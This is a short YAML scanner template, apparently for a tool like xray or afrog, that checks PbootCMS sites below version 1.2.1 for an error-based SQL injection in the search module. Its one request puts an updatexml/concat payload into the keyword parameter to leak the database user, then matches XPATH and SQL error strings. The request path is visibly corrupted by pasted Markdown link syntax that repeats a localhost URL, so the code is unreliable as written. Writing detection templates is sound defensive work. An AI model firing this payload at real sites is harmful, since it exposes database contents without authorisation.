id: PbootCMS-search-SQL

info:
  name: PbootCMS search SQL注入漏洞
  author: daffainfo
  severity: critical
  description: PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息。漏洞影响:PbootCMS < 1.2.1  app="PBOOTCMS"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/PbootCMS%20search%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md

rules:
  r0:
    request:
      method: GET
      path: /index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)
    expression: response.status == 200 && response.body.bcontains(b'XPATH syntax error') && response.body.bcontains(b'执行SQL发生错误')
expression: r0()